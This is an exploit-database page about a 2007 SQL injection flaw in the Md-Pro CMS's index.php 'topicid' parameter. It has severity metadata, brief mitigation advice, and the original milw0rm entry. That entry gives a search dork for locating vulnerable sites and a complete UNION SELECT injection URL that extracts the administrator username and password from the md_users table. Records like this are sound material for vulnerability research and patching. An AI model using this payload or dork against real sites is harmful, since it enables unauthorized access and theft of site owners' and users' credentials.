Md-Pro SQL Injection Vulnerability

vendor:

Md-Pro

by:

Unknown

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Md-Pro

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Md-Pro SQL Injection Vulnerability

The exploit allows an attacker to perform SQL injection by manipulating the 'topicid' parameter in the 'index.php' file. By exploiting this vulnerability, an attacker can retrieve the username and password from the 'md_users' table.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Also, implementing parameterized queries or prepared statements can help prevent SQL injection attacks.

Source

Exploit-DB raw data:

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Site:      http://www.maxdev.com
Download:  http://www.maxdev.com/mod-Areafiles-display-lid-510-cid-1.phtml
Dork:      "Powered by Md-Pro"
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!Exploit :!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!   

http://www.site.com/[mdpro_path]/index.php?module=Topics&func=view&topicid=-1 UNION ALL SELECT null,null,concat(pn_uname,0x3a,pn_pass),null,null,null,null from md_users where pn_uid=2/*

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Default prefix is "md_" change it if needed

# milw0rm.com [2007-07-18]